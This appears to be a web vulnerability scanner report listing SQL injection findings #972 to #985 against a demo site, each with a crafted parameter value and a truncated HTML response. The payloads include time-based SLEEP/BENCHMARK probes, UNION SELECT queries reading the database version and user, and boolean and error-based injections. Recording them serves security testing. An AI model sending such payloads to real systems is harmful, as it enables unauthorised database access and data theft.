name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #972\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #973\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #974\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #975\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #976\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #977\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #978\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or (\"1\"=\"1\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #979Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHAVING 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #980\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #981\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #982\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,2,1))='y'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #983\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #984\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor SLEEP(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #985\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning 